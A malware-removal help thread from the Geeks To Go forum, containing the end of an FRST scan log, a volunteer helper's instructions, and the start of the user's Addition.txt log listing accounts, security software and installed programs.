2016-03-01 12:57 - 2016-02-23 02:04 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2016-03-01 12:57 - 2016-02-23 02:04 - 00382464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-03-01 12:57 - 2016-02-23 02:02 - 01318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-03-01 12:57 - 2016-02-23 02:02 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2016-03-01 12:57 - 2016-02-23 02:02 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2016-03-01 12:57 - 2016-02-23 01:58 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-03-01 12:57 - 2016-02-23 01:58 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerServer.dll
2016-03-01 12:57 - 2016-02-23 01:58 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2016-03-01 12:57 - 2016-02-23 01:57 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TimeBrokerClient.dll
2016-03-01 12:57 - 2016-02-23 01:54 - 00402432 _____ (Microsoft Corporation) C:\WINDOWS\system32\sharemediacpl.dll
2016-03-01 12:57 - 2016-02-23 01:52 - 00456704 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2016-03-01 12:57 - 2016-02-23 01:50 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSFlacDecoder.dll
2016-03-01 12:57 - 2016-02-23 01:49 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-03-01 12:57 - 2016-02-23 01:48 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2016-03-01 12:57 - 2016-02-23 01:47 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2016-03-01 12:57 - 2016-02-23 01:47 - 00157184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2016-03-01 12:57 - 2016-02-23 01:41 - 03594240 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-03-01 12:57 - 2016-02-23 01:38 - 00480256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 01118208 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 00613376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 00394752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00713728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00379392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmkvsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-01 12:57 - 2016-02-23 01:35 - 00400896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2016-03-01 12:57 - 2016-02-23 01:31 - 00585216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2016-03-01 12:57 - 2016-02-23 01:31 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2016-03-01 12:57 - 2016-02-23 01:30 - 02275840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-03-01 12:57 - 2016-02-23 01:30 - 01832448 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-03-01 12:57 - 2016-02-23 01:30 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2016-03-01 12:57 - 2016-02-23 01:29 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2016-03-01 12:57 - 2016-02-23 01:29 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-03-01 12:57 - 2016-02-23 01:28 - 00555520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncController.dll
2016-03-01 12:57 - 2016-02-23 01:28 - 00256512 _____ (Microsoft Corporation) C:\WINDOWS\system32\accountaccessor.dll
2016-03-01 12:57 - 2016-02-23 01:26 - 02158592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-03-01 12:57 - 2016-02-23 01:26 - 01498112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
2016-03-01 12:57 - 2016-02-23 01:25 - 01996288 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 04827136 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 01105920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 00489984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2016-03-01 12:57 - 2016-02-23 01:22 - 01944576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-03-01 12:57 - 2016-02-23 01:21 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-03-01 12:57 - 2016-02-23 01:21 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-03-01 12:57 - 2016-02-23 01:20 - 00083456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputLocaleManager.dll
2016-03-01 12:57 - 2016-02-23 01:17 - 02635264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-03-01 12:57 - 2016-02-23 01:14 - 00990720 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2016-03-01 12:57 - 2016-02-23 01:11 - 01390080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-03-01 12:57 - 2016-02-23 01:05 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll
2016-03-01 12:57 - 2016-02-23 01:01 - 02295808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2016-03-01 12:57 - 2016-02-23 00:59 - 01500672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-03-01 12:57 - 2016-02-23 00:58 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncController.dll
2016-03-01 12:57 - 2016-02-23 00:56 - 04412928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 04894208 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 02229760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 01707520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2016-03-01 12:57 - 2016-02-23 00:53 - 01799168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-03-01 12:57 - 2016-02-23 00:51 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2016-03-01 12:57 - 2016-02-23 00:42 - 03425792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-03-01 12:57 - 2016-02-23 00:41 - 02912256 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2016-03-01 12:57 - 2016-02-23 00:36 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-03-01 12:57 - 2016-02-23 00:35 - 07533568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-03-01 12:57 - 2016-02-23 00:33 - 02604032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2016-03-01 12:57 - 2016-02-23 00:32 - 02793472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-03-01 12:57 - 2016-02-23 00:30 - 02061312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-03-01 12:57 - 2016-02-23 00:28 - 06740992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2016-03-01 12:57 - 2016-02-23 00:26 - 12587520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-03-01 12:57 - 2016-02-08 22:28 - 00277856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-03-01 12:57 - 2016-02-08 22:13 - 00185184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-03-01 12:57 - 2016-02-08 21:18 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\system32\thumbcache.dll
2016-03-01 12:57 - 2016-02-08 21:18 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2016-03-01 12:57 - 2016-02-08 21:07 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-03-01 12:57 - 2016-02-08 21:07 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2016-02-29 10:48 - 2016-03-08 09:43 - 00000000 ____D C:\ProgramData\e16f6b56-0817-0
2016-02-29 10:43 - 2016-03-08 09:43 - 00000000 ____D C:\ProgramData\e16f6b56-53e7-0
2016-02-29 10:43 - 2016-03-08 09:43 - 00000000 ____D C:\ProgramData\67322837
2016-02-29 10:43 - 2016-02-29 10:43 - 00003890 _____ C:\WINDOWS\System32\Tasks\{D1996BD7-8FB6-7614-566B-6FE1DB83922B}
2016-02-29 10:43 - 2016-02-29 10:43 - 00000000 ____D C:\ProgramData\{0b294307-012c-1}
2016-02-29 10:43 - 2016-02-29 10:43 - 00000000 ____D C:\ProgramData\{09b42448-312c-0}
2016-02-23 13:55 - 2016-02-23 13:55 - 00007238 _____ C:\Users\levilaing\Downloads\ACRB.txt
2016-02-16 17:08 - 2016-02-16 17:08 - 01046528 _____ C:\Users\levilaing\Downloads\MicrosoftFixit50848.msi
2016-02-12 13:50 - 2016-02-17 19:18 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-09 13:01 - 2016-01-29 00:57 - 04502352 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-02-09 13:01 - 2016-01-29 00:33 - 04064320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-02-09 13:01 - 2016-01-27 00:15 - 01557776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-02-09 13:01 - 2016-01-27 00:01 - 01997328 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-02-09 13:01 - 2016-01-26 23:59 - 00304752 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2016-02-09 13:01 - 2016-01-26 23:57 - 01824264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-09 13:01 - 2016-01-26 23:57 - 00820704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-09 13:01 - 2016-01-26 23:55 - 00081112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpenWith.exe
2016-02-09 13:01 - 2016-01-26 23:54 - 00295264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-02-09 13:01 - 2016-01-26 23:46 - 02606824 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-09 13:01 - 2016-01-26 23:46 - 01270072 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-09 13:01 - 2016-01-26 23:44 - 00604928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-02-09 13:01 - 2016-01-26 23:44 - 00085320 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpenWith.exe
2016-02-09 13:01 - 2016-01-26 23:43 - 00359776 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-02-09 13:01 - 2016-01-26 23:21 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-09 13:01 - 2016-01-26 23:15 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
2016-02-09 13:01 - 2016-01-26 23:11 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-09 13:01 - 2016-01-26 23:10 - 00099840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-09 13:01 - 2016-01-26 23:08 - 00299008 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-09 13:01 - 2016-01-26 23:08 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-02-09 13:01 - 2016-01-26 23:07 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iassam.dll
2016-02-09 13:01 - 2016-01-26 23:04 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-09 13:01 - 2016-01-26 23:02 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-09 13:01 - 2016-01-26 23:01 - 00792064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-09 13:01 - 2016-01-26 22:59 - 00258048 _____ (Microsoft Corporation) C:\WINDOWS\system32\iassam.dll
2016-02-09 13:01 - 2016-01-26 22:57 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-02-09 13:01 - 2016-01-26 22:52 - 00970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-09 13:01 - 2016-01-26 22:50 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-09 13:01 - 2016-01-26 22:49 - 05662208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-02-09 13:01 - 2016-01-26 22:44 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cfgbkend.dll
2016-02-09 13:01 - 2016-01-26 22:42 - 01387520 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-02-09 13:01 - 2016-01-26 22:38 - 07835648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-02-09 13:01 - 2016-01-26 22:32 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-02-09 13:01 - 2016-01-26 22:31 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\cfgbkend.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-08 17:33 - 2014-07-08 15:30 - 00000000 ____D C:\Users\levilaing\AppData\Local\Adobe
2016-03-08 17:31 - 2014-07-07 11:34 - 00000922 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-03-08 16:57 - 2015-10-30 01:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-08 16:57 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-03-08 16:57 - 2013-09-13 13:01 - 00000000 ____D C:\Users\levilaing\AppData\Local\Packages
2016-03-08 16:54 - 2014-07-07 11:34 - 00000000 ____D C:\Users\levilaing\AppData\Local\Google
2016-03-08 16:54 - 2014-07-07 11:34 - 00000000 ____D C:\Program Files (x86)\Google
2016-03-08 16:54 - 2014-01-16 14:20 - 00000000 ____D C:\ProgramData\Google
2016-03-08 16:53 - 2012-12-20 18:47 - 00000000 ____D C:\Program Files (x86)\CyberLink
2016-03-08 16:53 - 2012-12-20 18:32 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-03-08 16:52 - 2012-12-20 18:46 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2016-03-08 16:51 - 2015-09-28 19:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2016-03-08 16:50 - 2015-09-28 19:17 - 00000000 ____D C:\Program Files\Canon
2016-03-08 16:50 - 2014-01-21 17:04 - 00000000 ____D C:\Program Files (x86)\Canon
2016-03-08 16:44 - 2013-09-13 15:32 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-03-08 15:31 - 2013-12-13 19:44 - 00000000 ____D C:\Users\levilaing\AppData\LocalLow\AuthenTec
2016-03-07 17:19 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\rescache
2016-03-07 17:04 - 2016-01-06 10:04 - 00000000 ____D C:\WINDOWS\System32\Tasks\Norton Security
2016-03-07 17:01 - 2015-03-31 19:40 - 00000000 ____D C:\Program Files (x86)\Fitbit Connect
2016-03-01 13:45 - 2015-12-19 19:24 - 00972104 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-03-01 13:45 - 2015-10-30 01:21 - 00000000 ____D C:\WINDOWS\INF
2016-03-01 13:43 - 2014-07-07 11:34 - 00000918 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-03-01 13:41 - 2015-12-19 19:25 - 00000000 ____D C:\Users\levilaing
2016-03-01 13:40 - 2015-09-01 10:45 - 00000000 __SHD C:\Users\levilaing\IntelGraphicsProfiles
2016-03-01 13:40 - 2012-12-20 19:23 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-03-01 13:38 - 2015-10-30 00:28 - 00008192 ___SH C:\WINDOWS\system32\config\ELAM
2016-03-01 13:37 - 2015-12-19 19:44 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-03-01 13:37 - 2015-12-19 19:15 - 04967824 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-03-01 13:35 - 2015-10-30 00:28 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-03-01 13:33 - 2015-10-30 03:07 - 00000000 ____D C:\Program Files\Windows Journal
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 __RSD C:\WINDOWS\Media
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ___RD C:\WINDOWS\PurchaseDialog
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-03-01 13:33 - 2015-10-30 00:28 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-03-01 13:33 - 2015-10-30 00:28 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-03-01 13:27 - 2015-12-24 12:27 - 00000000 ____D C:\ProgramData\Norton
2016-03-01 13:06 - 2015-10-30 01:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-03-01 08:26 - 2015-12-07 08:59 - 00002005 _____ C:\Users\levilaing\Desktop\Dashlane.lnk
2016-03-01 08:26 - 2015-12-07 08:58 - 00000000 ____D C:\Users\levilaing\AppData\Roaming\Dashlane
2016-02-29 13:22 - 2015-12-18 17:44 - 00000000 ____D C:\Program Files\Phrase Professor191220150009
2016-02-29 13:22 - 2013-09-13 13:11 - 00000000 ____D C:\Users\levilaing\AppData\Local\ElevatedDiagnostics
2016-02-29 10:43 - 2015-12-18 17:46 - 00000000 ____D C:\ProgramData\1e908d04-5b25-1
2016-02-29 10:43 - 2015-12-18 17:46 - 00000000 ____D C:\ProgramData\1e908d04-21f7-0
2016-02-23 16:21 - 2015-12-15 14:22 - 00000000 ____D C:\Users\levilaing\Desktop\Tor Browser
2016-02-22 18:32 - 2014-07-07 11:35 - 00002456 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-17 19:42 - 2014-10-21 09:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-02-17 19:42 - 2013-11-15 12:08 - 00000000 ____D C:\ProgramData\Oracle
2016-02-17 19:42 - 2013-11-15 12:08 - 00000000 ____D C:\Program Files (x86)\Java
2016-02-17 19:41 - 2016-01-05 13:15 - 00000000 ____D C:\Users\levilaing\.oracle_jre_usage
2016-02-17 19:41 - 2014-10-21 09:58 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-02-17 19:18 - 2016-01-05 13:35 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-02-16 13:23 - 2016-01-05 13:36 - 00000000 ____D C:\Users\levilaing\AppData\Local\CrashDumps
2016-02-12 18:00 - 2013-12-24 11:04 - 00000000 ____D C:\Program Files (x86)\HP SimplePass
2016-02-09 14:04 - 2013-08-22 07:25 - 00000167 _____ C:\WINDOWS\win.ini
2016-02-09 14:03 - 2013-09-16 08:59 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-02-09 13:57 - 2013-09-16 08:59 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-02-09 09:02 - 2013-09-16 14:19 - 00000000 ____D C:\Users\levilaing\Documents\Youcam

==================== Files in the root of some directories =======

2015-12-18 17:54 - 2015-12-18 17:54 - 0001035 _____ () C:\Program Files (x86)\suit.log
2014-04-18 15:32 - 2014-04-18 15:32 - 0007168 _____ () C:\Users\levilaing\AppData\Roaming\SQLiteManager3.pref
2014-02-04 20:57 - 2014-02-04 20:57 - 0000045 _____ () C:\Users\levilaing\AppData\Roaming\WB.CFG
2014-05-23 10:53 - 2014-05-23 10:53 - 0002165 _____ () C:\Users\levilaing\AppData\Local\recently-used.xbel

Some files in TEMP:
====================
C:\Users\levilaing\AppData\Local\Temp\Maint000.exe
C:\Users\levilaing\AppData\Local\Temp\Maint001.exe
C:\Users\levilaing\AppData\Local\Temp\Maint002.exe


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-03-02 03:16

==================== End of FRST.txt ============================



#2
pystryker

    Trusted Helper

  • Malware Removal
  • 3,886 posts
Hello and welcome to Geeks To Go! My nickname is Pystryker :) , and I will be helping you with your issue today.


Before we get started, I have a few things I need to go over with you:
  • If you are receiving help for this issue at another forum, please let me know so I can close this thread.
  • Please download to and run all requested tools from your Desktop.
  • Please do not install any new software during the cleaning process other than the tools I provide for you.  This can hinder the cleaning process.
  • At the top of your post, please click on the "Follow this topic" button and make sure that the "Received notification" box is checked and set to "Instantly". This will send an email to you as soon as I reply to your topic, allowing us to solve your problem faster.
  • If any of your security programs give you a warning about any tool I ask you to use, please do not worry.  All the links and tools I provide to you will be safe.
  • Please do not run any tools other than the ones I ask you to, when I ask you to.  Some of these tools can be very dangerous if used improperly.  Also, if you use a tool that I have not requested you use, it can cause false positives, thereby delaying the complete cleaning of your machine.
  • This is a complicated process.  It requires several steps, patience, and careful following of my instructions in the order they are given to diagnose your problems to get your machine back in working order.
  • Please stay with me until the end of all steps and procedures and I declare your system clean.  Just because there is a lack of symptoms does not indicate a clean machine.  I promise to do the same for you.
  • It is impossible for me to know what interactions may happen between your computer's software and the tools we will use to clean your machine.  Therefore, I highly recommend you back up any critical personal files on your machine before we start.
  • If you have any questions at all, please don't hesitate to ask.  There's no such thing as a stupid question when dealing with malware.
  • If you are unsure of an instruction I give you, or if something unexpected occurs, Do NOT proceed!  Stop and ask for clarification of the instruction or tell me what occurred.
  • Please remember, the fixes are for your machine and your machine ONLY!  Do not use these fixes on any other machine; each fix is tailor-made for your system only.  Using a fix on another machine can and will cause serious damage.
  • Once we have cleaned your machine, we'll have some cleanup and prevention steps to go through. We will also provide you with some information about how to reduce your chances of infection and get some protections in place to help defend you against this in the future.
  • Please be patient while I am analyzing your logs.  I know you are probably scared and very frustrated with this problem, but I am a volunteer and sometimes life does get in the way. :)
Now, let's get started, shall we? :thumbsup:


Hello :)

There was a second log produced called Addition.txt during the initial run of FRST, and it can be found here: C:\Users\levilaing\Downloads\Addition.txt. Please post that log for my review.

I'm currently analyzing your FRST log and preparing a fix. :thumbsup:

Things I need to see in your next post:

Addition.txt Log


#3
LLL31

    Member

  • Topic Starter
  • 15 posts

I ran the program more than once because I thought I did it wrong, so I erased the addition.txt log. Is there any way to retrieve it?



#4
LLL31

    Member

  • Topic Starter
  • 15 posts

Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by levilaing (2016-03-08 16:37:02)
Running from C:\Users\levilaing\Downloads
Windows 10 Home Version 1511 (X64) (2015-12-20 01:54:43)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1018505005-2824899964-3694806622-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1018505005-2824899964-3694806622-503 - Limited - Disabled)
Guest (S-1-5-21-1018505005-2824899964-3694806622-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1018505005-2824899964-3694806622-1005 - Limited - Enabled)
levilaing (S-1-5-21-1018505005-2824899964-3694806622-1001 - Administrator - Enabled) => C:\Users\levilaing

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton Security (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Security (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Security (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.5.146 - Adobe Systems, Inc.)
AuthenTec TrueAPI 64-bit (Version: 1.6.0.87 - AuthenTec, Inc.) Hidden
BioExcess (Version: 6.5.5.20 - Egis Technology Inc.) Hidden
BitTorrent (HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\BitTorrent) (Version: 7.9.5.41163 - BitTorrent Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.6.0.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version:  - Canon Inc.)
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version: 4.0.0 - Canon Inc.)
Canon MG2500 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG2500_series) (Version: 1.00 - Canon Inc.)
Canon MG2500 series On-screen Manual (HKLM-x32\...\Canon MG2500 series On-screen Manual) (Version: 7.6.1 - Canon Inc.)
Canon MG2500 series User Registration (HKLM-x32\...\Canon MG2500 series User Registration) (Version:  - ‭Canon Inc.)
